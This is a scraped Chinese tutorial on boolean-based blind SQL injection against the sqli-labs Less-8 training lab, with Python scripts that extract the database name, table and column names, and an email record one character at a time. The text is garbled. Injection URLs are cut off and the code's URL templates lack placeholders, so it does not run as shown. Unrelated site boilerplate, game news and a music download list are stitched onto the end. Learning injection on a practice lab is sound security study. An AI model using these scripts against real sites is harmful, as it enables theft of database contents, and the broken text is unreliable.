基于布尔的盲注
Web的页面的仅仅会返回True和False。那么布尔盲注就是进行SQL注入之后然后根据页面返回的True或者是False来得到数据库中的相关信息。
由于本次是布尔注入,手注无法完整地进行脱裤。所以在本节需要编写大量的代码来帮助我们进行SQL注入,得到数据。所以在这章里面会有很多的Python代码。
本次的示例就是Less-8。
通过进行下面的语句的注入测试
http://localhost/sqlilabs/Less-8/" http://localhost/sqlilabs/Less-8/"htmlcode">select field from table where id='userinput'id参数是被单引号包括的。其他的信息我们就无法得到了。
得到数据库的名称
在得到数据库的名称之前,首先需要得到数据库的长度
http://localhost/sqlilabs/Less-8/"htmlcode">def get_db_name(): result = "" url_template = "http://localhost/sqlilabs/Less-8/" chars = '0123456789ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz' for i in range(1,9): for char in chars: char_ascii = ord(char) url = url_template.format(i,char_ascii) response = requests.get(url) length = len(response.text) #返回的长度只有706和722 if length>706: result += char break print(result)得到最后的结果的是security,是正确的。
得到数据库中的表信息
其实所有的SQL注入步骤都是类似的。首先得到数据库的名称(这一步不是必须的),然后得到当前数据库的表名称,然后得到表的字段,最后进行脱裤。这个步骤在前一章已经有说明了。
首先看一个简单的SQL盲注获取数据库表信息的写法。
http://localhost/sqlilabs/Less-8/"htmlcode">http://localhost/sqlilabs/Less-8/"htmlcode">def get_table_name(): result = "" url_template = "http://localhost/sqlilabs/Less-8/" chars = '0123456789ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz' for i in range(1,7): for char in chars: char_ascii = ord(char) url = url_template.format(i,char_ascii) response = requests.get(url) length = len(response.text) #返回的长度只有706和722 if length>706: result += char break print(result)最后得到了第一个表名是emails,如果要得到其他的表名只需要将代码
limit 0,1
修改成为limit 1,1
或者是其他的就可以了。得到表名的列信息
在得到列名之前,同样需要知道在表中的字段长度。例如我们想要知道在emails表中的长度,那么就可以使用如下的语句来获取。
http://localhost/sqlilabs/Less-8/"htmlcode">http://localhost/sqlilabs/Less-8/"htmlcode">def get_column_name(): result = "" url_template = "http://localhost/sqlilabs/Less-8/" chars = '0123456789ABCDEFGHIJKLMNOPQRSTUVWXYZ_abcdefghijklmnopqrstuvwxyz' for i in range(1,3): for char in chars: char_ascii = ord(char) url = url_template.format(i,char_ascii) response = requests.get(url) length = len(response.text) #返回的长度只有706和722 if length>706: result += char break print(result)通过上面这个代码,我们可以得到在emails表中存在的字段名称分别是
id
和email_id
脱裤
在得到了字段名称之后,接下来最重要的一步就是进行脱裤了。
在进行脱裤之前,我们首先判断在emails表中有多少条记录。使用的语句如下:
http://localhost/sqlilabs/Less-8/"htmlcode">http://localhost/sqlilabs/Less-8/"htmlcode">def get_data(): result = "" url_template = "http://localhost/sqlilabs/Less-8/" chars = '.0123456789@ABCDEFGHIJKLMNOPQRSTUVWXYZ_abcdefghijklmnopqrstuvwxyz' for i in range(1,17): for char in chars: char_ascii = ord(char) url = url_template.format(i,char_ascii) response = requests.get(url) length = len(response.text) #返回的长度只有706和722 if length>706: result += char break print(result)通过上面的这段代码就得到了内容是Dumb@dhakkan.com,其他的内容就同样通过这段方式得到数据了。这里就不作演示了。
总结
其实基于布尔盲注和基于时间的盲注都是需要编写大量的代码,就像本篇的文章一样。之前在简单的SQL注入中,一句SQL注入代码就可以解决的问题在这里就需要编写Python代码来进行大量的注入测试才能够得到内容。其实之前我也很少完整的用Python来编写SQL注入代码完成整个布尔盲注的注入过程。通过本章的编写,熟悉了使用Python代码完整地进行一次布尔盲注的过程了,学习了很多。以上就是这篇文章的全部内容了,希望对大家能有所帮助。
神剑山庄资源网 Design By www.hcban.com神剑山庄资源网 免责声明:本站文章均来自网站采集或用户投稿,网站不提供任何软件下载或自行开发的软件! 如有用户或公司发现本站内容信息存在侵权行为,请邮件告知! 858582#qq.com神剑山庄资源网 Design By www.hcban.com暂无SQL注入之基于布尔的盲注详解的评论...稳了!魔兽国服回归的3条重磅消息!官宣时间再确认!
昨天有一位朋友在大神群里分享,自己亚服账号被封号之后居然弹出了国服的封号信息对话框。
这里面让他访问的是一个国服的战网网址,com.cn和后面的zh都非常明白地表明这就是国服战网。
而他在复制这个网址并且进行登录之后,确实是网易的网址,也就是我们熟悉的停服之后国服发布的暴雪游戏产品运营到期开放退款的说明。这是一件比较奇怪的事情,因为以前都没有出现这样的情况,现在突然提示跳转到国服战网的网址,是不是说明了简体中文客户端已经开始进行更新了呢?
更新日志
2024年11月05日2024年11月05日
- 雨林唱片《赏》新曲+精选集SACD版[ISO][2.3G]
- 罗大佑与OK男女合唱团.1995-再会吧!素兰【音乐工厂】【WAV+CUE】
- 草蜢.1993-宝贝对不起(国)【宝丽金】【WAV+CUE】
- 杨培安.2009-抒·情(EP)【擎天娱乐】【WAV+CUE】
- 周慧敏《EndlessDream》[WAV+CUE]
- 彭芳《纯色角3》2007[WAV+CUE]
- 江志丰2008-今生为你[豪记][WAV+CUE]
- 罗大佑1994《恋曲2000》音乐工厂[WAV+CUE][1G]
- 群星《一首歌一个故事》赵英俊某些作品重唱企划[FLAC分轨][1G]
- 群星《网易云英文歌曲播放量TOP100》[MP3][1G]
- 方大同.2024-梦想家TheDreamer【赋音乐】【FLAC分轨】
- 李慧珍.2007-爱死了【华谊兄弟】【WAV+CUE】
- 王大文.2019-国际太空站【环球】【FLAC分轨】
- 群星《2022超好听的十倍音质网络歌曲(163)》U盘音乐[WAV分轨][1.1G]
- 童丽《啼笑姻缘》头版限量编号24K金碟[低速原抓WAV+CUE][1.1G]